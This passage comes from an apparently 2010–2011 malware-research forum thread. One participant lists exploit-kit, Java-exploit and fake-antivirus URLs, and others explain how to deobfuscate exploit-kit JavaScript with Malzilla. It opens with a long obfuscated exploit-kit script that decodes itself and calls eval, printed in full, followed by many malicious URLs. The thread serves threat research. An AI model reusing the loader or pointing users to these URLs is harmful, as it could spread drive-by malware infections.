tutunaeVtnu`;is~g)tUoi=se`g!i~`>mJeaci+,ouUtBL{`agne`lili(bcspzfil)`iosus`xt`b~(4=cn8a8gOecl{%`;<bbxa+n`eimve=n`iCBi'e.p4'~-CtPet/np;;ttmh`Q.altes(vtS0Eaex;%(+ut;totaDn`yiin`lAdCen=Hl;B)atppl50r()jirteh/ans.T)t)(MShio.i.=tre.F0uaa;:B2atva;obtalulaoet;(t=iisapebmMcpo=<ucn`o&i=debnod-'s}caridddti1E764FF6r20F0F4F9BE33B44F8AE6B99BE08182F3FD512ACE9744E8408665535E6BB50B3100C3C47076673F7ECF44FF433C05DE3440653C5E7E`0002EB0660746666667666474500000000008050a00175056=Swi(',209N=aE88e2622226336=aACCe2666327736=aA88e6225222422=aA55e2254262366=aA55e2242225666=aE55e2244562763=neDPmiuA)ib'pi=v]o.()arlnSq((o))('1Pdt0m,AAwl(n|,0N=au0(gptSw5s8a8C21030F10FA5E01010003D48D35CF331153A4053CFC14B01C30A3EEBCFDF033631EF03330FEC8227B2993702246113D10002FB0F9022700s`e>fc84<v1u10ubcu18u20u1cub0u00u0eu09u91u91ubcu02u5au10u01u00u00u53u39u0bu3bu05ue3u49ud5ub0ub7u22u74ue3u'uE4u904Fu1Auau31u0DI=(cB=oph;hea`=donh)te=ai)om0c`(t`gyht(cTuFfU~osE)fFe.,=;uwm```d.2r.={~cuu,roe~a=`}`nmfttAar)(eew}pga;y{iht;Hi)u,twg(nf`ls=|rstt};ethnTncgc(o(n:`s.));yJnz`t`+;=o`o=uo`ro`)`SvUyzavar)g`0lztz~ck~Beugl{szwilhsih+I%v;`xe~p)tP(aobuew`ll8r+asnveaE'd'd1Dgotia5`c46=Ada'tl}vrie`nuQt)(ru(eaH(Apw8vun=be`uc(vad(.nncgetohtn'Eady;re.)a5C`';eoer`tal(e.o;r;)BMtn.1=n```EcE-nrto83.reatonltpomdp.)c})`'eegrtDeyoeec'/n)t=n`n`cxj`s:9`)}tr.cogFin33227667`53F01EE2A561B06B68549F90C05C34D3C0FC497C73BC8DF6A599043B100518864C06045018E3DF9BC88B8C81E24D78DA48D3D8D337t00005F0E9D03C55D28631EF0333B72F01140F3D0r229740F9nhaa()08,,`'tA6230983A82587=tA6235466303898=tA623A58EA950A4=tA623A9E867098B=tA623A3085BEB17=tA6235A82E40A65fk{FDeftt;gu0poPa+rm'[rsv(Hy(ly;&'))Df()e4Scaa'=|8,`'rn8st+rC`=s9=00F0F90033B12B0007B00664266767766566466276667666763667641654777766776667101000000001000000000000D011000012000000e((<1l05/a%00%a0%04%80%80%74%50%06%76%f0%f0%38%80%0f%0e%e0%50%67%64%56%83%07%00%8a%d5%06%8c%08%07%06%76%0%33%33'6%32%3r73%62%Cs)ta`cBetinxt`Vtc.;yn`nd;tsx.=lhnt``u0.jnT`XRteF)CTmv``vbh`d0wtl`np`r`2~n`on;sn`2i0`u`ahrrg{anmf;e)g}ptne3`(s;t`yf,tg`asi`|o``hte.aiclc(et)tat`i.n;;}po(e~a=`}`nmf`mSi`u={~ckJ.Udarg{t=xoeieMl`)a+ntcvie`zteim``Cua`t)s)./h;)pcl0mh0oo0`)ltt'nrlxC<=7DhbEnr5+lBB~R_r+.'vayv.(eiuc{csbvrr1)Pe`6a0uns`i`u'itCisddtgmtciEeaAyoI}`Es;s60qmvcnae=tfs)B/F}y};(Btta22a'EollEAc`e2AEl`Ere./eopye(pl{hf{w3''maAod.vs=k4ec{B``ed-.Oee)D6+;li`arwerok94E60EC3t00F02B5B0B5300402B38C9AB00CAC284AE201F0AF2EFF7F8F78853F0284020F38E63F530E7633F140B010FD7F0D2A7341129D59150h000491166666663662667766671000000000F000`00056066eovbs|',409Wa'29+6322257666'a'29+2262366676'a'29+6222222522'a'29+2524276266'a'29+2452502676'a'29+2245666763d)P(Fnretpht'endr)ma.1sef'Oqsvz}&k;&F'';o0Htvs$=(719W`e'kh=i.A089'01F0F00154C2562007F048F2EFC295454398D6C401E1996C91A1521D095F544458942CF068A5D45751991730009159180D02A87447122020{e~/`a-5bru0dud9u0eu10u10u46u20u1au8auf0uf0u50u92u2fu1aua0ub0u50u17u75u9cu28u02u5bu79u06u53u05u14u0fu04u0u13u7F;8u2Fu1`09u9EuKk{is(`aahlgAhn(ota}pat((}ygbp`e)eh~+r,pVcj(Mo`IT`Ujpaw~asi=ixihe=`rfe+``c4t(itc4;f)ss1girg`trg[ue.{];ehg~2i3.t3~.u`y~Srez6`w~behmKgs.zt~`G;yr`1`ne}t;eSa;sn`2i0`u`1`cscn`tzBpofyorg`sh`fc`p+azs;s8cOoaz`~eilzui~i9rih;c`n2)}{eko0pixcc0i{sa.)t`eph'~-Ctjlne2`s2~0Apg`g)ar{eQewcihvoisest0;((A0rc.utn++mboah=eooi=erullrtP:cdfpleps-4`sat'ta`pie;o/ic{c})(pev6`vMx`eaFBhoE.D9aol`Etn-olmnoean`uvi0>`ymcm`sis'w2mtdyffde1tfcd`2B`}eompo`Mon=33723623h63F03F7B9969095F8F652EB9000D04B9CB43CF45D93F9D6DF4BB03F2E208B4F3DB633600C4D12859461DE6A68FB3D0DA33FBE8DD41e0003C405E6CC1C15AE58942CF0875C402000F140t220F906Dwcelv|)05,,I=+70'43658E6476W=+70'60705A7217W=+70'8483684E83W=+70'8F478A804AW=+70'60E998AA37W=+70'6A7416B3B4a;D)(ta(r.te)n`f`,=t']eI='W.v<ye(t}&()Q}u01iehv's'2,Ims)d`nnlr;95400F5103684E5AD0000117276676077626362666667773766474766666755266666466667001000000010002000000002244400D00200000'I)<dhs23o`50%81%30%0e%4e%00%80%05%0c%c5%50%39%e0%05%05%08%95%04%67%60%cf%01%00%00%08%d0%00%00%fa%44%40%7772%67%v%33%73s7%26%9Td}oem:spietlie)tit;ebr0M}p)arfn{w```n`rDtVUoubnj/XVtli0rtl`gFd`n`vout`&+2)oafre`}`{it6]sa`ihgttnmzd;e.i`)~`2Nh2ofntp`tg{e4s``e`ipF).pyiRca}pg=)<ewthe.critc4;f)ss10zB`ot0hnP(SuR```ii*a)a+l8xUi}e).Pdre&V`plems`g0`+i}a+e`;;v(.c0tl8kk0`hprc;.emli`c46=eee(8'i3`~MU`'e.r`cXu)`kc`enotri((})sr0`0l;ru+`eor'i0twwodnimdeHk(nu(u`et.i6F=xr(,em1:/)sdflara};):ri.niip=msAC(2lc9-u`enlyppliet)nu.(nad0<v.`caswe=aa5bioIeecx)o(tc+78eevnops:om`'3006A5EDe04FA2E744386583B8B992BF40E7878488F0D6F31045FF417FCDD5C7E65C8E05C4DBCA556C762203333B3E36B94A98B34554452F049s000BB7075666360566664666670000000000F020h00066066`kFe=(|',40Ntt5246722222366Itt1242676366676Itt1247222222222Itt1242225266666Itt1242725202767Itt5202242366663tLF;f.m'is'(;dP1f/(c).Inp)Pp=7sllje(';U}t00vF.eWv)40Nec;1<ogera9]650F345E4DC7B120000406E51469F3351F3CEFC16C943A6C1F35435DF1335081FE5F5A1E26C07E9728971921000401AAC6FFFB1010522200;E{bies85ds70ubcuc1u0aueau20u10u06u02u22u20u1cub0u00u0eu09ud9u07u12u40u07u0bu00u03u29u12u03u00ufbufcu60u304Fu1Auau31u0Dk4uE6u0I3en)a`eBs`hlsw;yoae.luxa;e{bou`tf~+~`loriDbvnetV`MDy2d1`reni,t:g~atnut```)tr`io+e(tz`~`.y=ni.hacpgeCmxst;)<,Hi~lucae|r.s``i~+`Ostu{xrDouor;e,`;`wfhimzBgfre`}`{it62nP1u`;isE~cnf=s=nz2r`t`e`iUzr`/p`e```t+lc-``bt9i+shp`w-rfaslk0ye0;.0=ertrda=e'l+lBB~cmr)6od-w'`n+oti`coOi{ATk(rtnrso))}{kr0nce`i;)qnd()l;A).notbe(mT')om'n=mAsd5C`m`''O';/d;.yiet.tc}{`s`4ogcl`esCDu`elC0n=m`eprlkcn.;dnlecrt'pasneirf''pv'eocdvv.O{L'`.`C-dl(`vNo`vJS6226'2776s04FA8D4AB8ABE26EB12130609B8BCBFB443D1FB7F4FFF07DF1C0005B501901506089A70124FF6EF5296E6A3669590CDAEEE429101Ca000FAF074C19A90355E5F5A1E25187008011FA43e2206D0C5Awl(=s|)07,`hhFF0B9A49A0667NhhFF0A87A426376NhhFF03395AA5595NhhFF0AA55987B4CNhhFF08E4FA86A71NhhFF085859848A2aO(}ncesbe,'dCD.i;[h;snta)Dd=1dsvvllk}Ic()(el9rIn|,,`mav)=p(nas5=554F65F8055A6250426806676666676666276767664664667667676666745667777676776111000000100110000000001600004304800034LPIovii04yk5%60%34%00%89%06%ce%e0%e0%d8%80%80%74%50%06%a6%f0%00%76%56%b3%00%10%a0%d1%59%e0%00%05%e4%66%76'6%32%3r73%62%d%33%70M;m({x6`a.(*o.`}pnnmpeebte.vetn>hu```teteorOtd`(DUor.`t2v(`ut`h`t0locrh0t>;yg(nf`l(heb;=m(=sss)g3tOlopd.ht;``(s)en4go|ili=|zA`fL.yvtdofnnlbe.`(fcfuispnP,`io+e(tz`~4sE0n:`sPNzBcX`i=se`g!i~`>mJee+8r=,s:0a`eo1s~yO0`).Yesf`eurhe`~.(0}s``aa(e.pdn;d`s2~0teH;4b:Bi`nk`bEnvonbc}ciTesr.iin;;fvda-u%n}nf{qty';d`t;s`c(ungeM`;neac`ete'A2plrS'b,q/zqW)l(csca}t-n`0narodni-E)=ma80c`e=meuuiatbdCca)t`h`alwasnc'`spe`dnu(((tfvoo's'D4cs'FiafdiSW8EF8;F906a01C0350685049E2E70905EC506048413C3D8CFF07E5FFA80FF5E55377BE485250F0B85F807667F5F5B4C33B66AE5B051548AE5226Am0001E02566774606677767677610000000000000s00066066caa''v(|',69ee8806722227276`eeCC02766362633`ee8806222222552`ee5502254576663`ee5502225254667`ee5505544776663.A)})r'rut`fohFG=v^(lpt(r;Ff61re<hsvneCa';)Xa'sN=|019opa;`;0gys+n7F4F38C006FBD501062A0F53C993D45E82F44619C1F1895192863415444533520422259498AA1FA147519CE70100433B48EEEA70271222F2OEEd>gdD0>d6u4cu40u01u05u13u6aua0ua0u01u10u10u46u20u1au6auf0u00u4fu04ub0u00uc0ub2ubbue3u02u00u08udducfu81;8u2Fu1`09u9Eu3u26u00EfpmtA5=sv42cvA;e(2pw))ahmlo)oc`rn+tahnoMneMf`0(rbvef=h3an(ms1`0h~2ttnixh>}p,tg`assr`e}=e)`t.u)](y`eltVnehf6~6.;ac`)f`nez=|elslEN.khVtt(nlamzccoouns.tsE`(nf`l(heb;)PN0t`i.jenP.Yfz`t`+;=o`o=uo`t`)o``i`xb~`d3h`tP%={nb(hustn`en+)fb0fu-0py)aipotd('i3`~>nTv;j0Cd+a~'jlnentjkttmi)iotno=}}ua2y(`ugvgom;.'#d(it}tIu'ttgnLo'enttdntt,39.2`h)j'.17.r;ethhhtfrJ.h/etorotdDF;`es48hdn`e`ngtt-oohhu{iv=irufms'=`aal-h>`mieeo(awb.ucB4.ejLemtoe(F7367v2266m0112DDFA3EB8ED7CBDF39D920ED0B5840BDB3F1128EFF4B4F81800438005B0408FC1B0F140EC34DCC5982E633C794D533E37A0D97De000561EF9190DEE3364222594972720031122B02a220C501Ctvs$W=s|)04,ssE60C4839660369ssE6097F7560B819ssE606464681EE49ssE608849F385889ssE60915F6F88619ssE60FE7574C7B1rD;f{e)ctA0rci(e/a,fvl(lsi('))x`9zefylKtQ}{Os)i`=('5,rerw0},t(8+o501B60E00DF39400006026766766664676366673676626473626607066654627440666467001010000000000000000D3D0000D0D00100016AEP";
function hlhtkt(hnxoir5){return hnxoir5.replace(/`/ig,' ').replace(/~/ig,'"').replace(/»/ig,String.fromCharCode(0x5*2)).replace(/•/ig,String.fromCharCode(0x2E*2));};var gsyna=1002;var czkpev3='';for (ctxodqa = gsyna; ctxodqa > 0; ctxodqa--){for (hriwklc5 = gsyna-ctxodqa; hriwklc5 <= bnfzxnh.length; hriwklc5=hriwklc5+gsyna){czkpev3=czkpev3+bnfzxnh.charAt(hriwklc5);}}var asioivh=czkpev3+"EERS();}}MDAC();";var ezbmfwb=hlhtkt(asioivh);this[String.fromCharCode(0x65,118,0x61,108)](ezbmfwb);


8.) Copy this code into Malzilla's decoder window and click "Run script" button. Click into the "Eval() results" window. The deobfuscated code now appears in bottom window.
This code isn't well formatted and therefore not easy to read. Mark all code and copy it into the upper decoder window. Now click the "Format code" button.

Now you can browse through the code and see the payload urls for various exploits.

This decoding procedure can also be done easily by script.  ;)

Title: Re: Malicious Domains by Lelenina
Post by: lelenina on December 14, 2010, 12:39:30 am
This decoding procedure can also be done easily by script.  ;)


Which script are you referring to?  That would be preferable.  However, I thought JsUnpack was supposed to deobfuscate it all.  Also, does this work for almost all, if not all exploits, not just Phoenix?  Thanks.
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on December 17, 2010, 10:07:15 pm
Code: [Select]
http://makeithappen2ce.info/madeit/index.php?dd64feb7318e7f06a42aec888d85154e
Exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on January 09, 2011, 07:28:52 am
Code: [Select]
http://wwwlilltlnu.co.cc/8j14renk/?5
Exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on January 25, 2011, 06:44:12 pm
Code: [Select]
http://takipu4.co.cc/notfound/inkujrgzk.php?n=setup174
Exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on January 26, 2011, 11:38:16 pm
Code: [Select]
http://bso3.co.cc/imgurl.php?hl=8da6357d55217c4b
Exploit kit.
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on January 27, 2011, 04:37:19 am
Code: [Select]
http://varapay01.co.cc/pp/jrfqysknxrdubucnjpbm.php?ID=15798
Exploit kit.
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on January 30, 2011, 06:23:55 am
Code: [Select]
http://wwwdilifiq.co.cc/m0td5iuo/?6
Exploit kit.
Would I find the payload of this the same way I would if it were a Phoenix Exploit Kit?
Title: Re: Malicious Domains by Lelenina
Post by: SysAdMini on January 30, 2011, 02:04:47 pm
Code: [Select]
http://wwwdilifiq.co.cc/m0td5iuo/?6
Exploit kit.
Would I find the payload of this the same way I would if it were a Phoenix Exploit Kit?

The url of this kit are being generated dynamically and work only once. For the same reason I don't list a payload url for these kits.
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on January 30, 2011, 05:38:46 pm
Code: [Select]
http://wwwdilifiq.co.cc/m0td5iuo/?6
Exploit kit.
Would I find the payload of this the same way I would if it were a Phoenix Exploit Kit?

The url of this kit are being generated dynamically and work only once. For the same reason I don't list a payload url for these kits.
Just out of curiosity though, what is the payload URL for this particular exploit kit?  Thanks.
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on January 30, 2011, 09:56:07 pm
Code: [Select]
http://vwi6.co.cc/catalog.php?one=d4474f74ed5e5acd
Exploit kit.
Code: [Select]
http://vwi6.co.cc/games/javaobe.jar
Java exploit.
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on February 01, 2011, 07:48:14 pm
Code: [Select]
http://gsgwet52ysy.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAA0NBAQFDA==
Exploit kit?
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on February 01, 2011, 07:51:58 pm
Code: [Select]
http://4sex.cz.cc/
Fake porn site leads to fake AV.
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on February 07, 2011, 12:28:55 am
Code: [Select]
http://188.127.229.180/tds/nc.php
Redirects to fake scanner page.
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on February 07, 2011, 09:00:48 pm
Code: [Select]
http://vwi8.co.cc/catalog.php?one=50b3cb8ecb2d58f3
Exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on February 08, 2011, 10:42:43 pm
Code: [Select]
http://vwi9.co.cc/catalog.php?one=6b2b857c90eacb53
Exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on February 13, 2011, 04:49:51 am
Code: [Select]
http://2314.in/1297575843.php
Exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on February 15, 2011, 01:22:21 am
Code: [Select]
http://moa3.co.cc/imgurlfx.php?hl=180ce3af78870604
Exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on February 20, 2011, 08:12:22 pm
Code: [Select]
http://dfe3.co.cc/catalog.php?one=6f92b8edd297f113
Exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on February 21, 2011, 10:06:08 pm
Code: [Select]
http://tmi8.co.cc/product.php?id=4b4083e7813c9baa
Exploit kit.
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on March 14, 2011, 04:03:13 am
Code: [Select]
http://mog3.co.cc/forum.php?tp=ab16731ef1d2ccc0
Exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on March 30, 2011, 01:15:15 am
Code: [Select]
http://virtualmov.com/en/stat.htm
Exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on April 17, 2011, 12:29:44 am
If the referrer is findgala.com
Code: [Select]
http://64.15.72.46:17777/click.php?go=4WIJBLIerRsykKPTgk7P+W0/H7Maq1S+LQbM5kJ0cCmT&d=VWLObkr7rqTpqcaJgPgP+Wm7BMROj21Xow0Lb+NPf8oKh78irwQz7KKN67MwyaJHPFpzzTco21vCvCday2p6C8N59XWPEXmEJoJY21AulwTkkJYilij6g6NqoVdtTep7mwUXcVkYbqaMDpXugEXaRHoMrULPF5XgVHmky+ntrvhkdTtxsu/Xyp3bP5ktpBVL+ih6usm7ZliK6d9iM5CGjFk41kOShjFXIoLe6F==&qq=mpeg+pornRedirects to exploit kit

Code: [Select]
http://chak1com.in/forum.php?tp=bb67d93310402f39
Exploit kit.
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on April 17, 2011, 04:59:04 pm
Code: [Select]
http://porntube.ipq.co/
Fake porn site redirects to exploit kit.
Code: [Select]
http://2t.cz.cc/forum.php?tp=fd82ea91ecc4d94c
Exploit kit.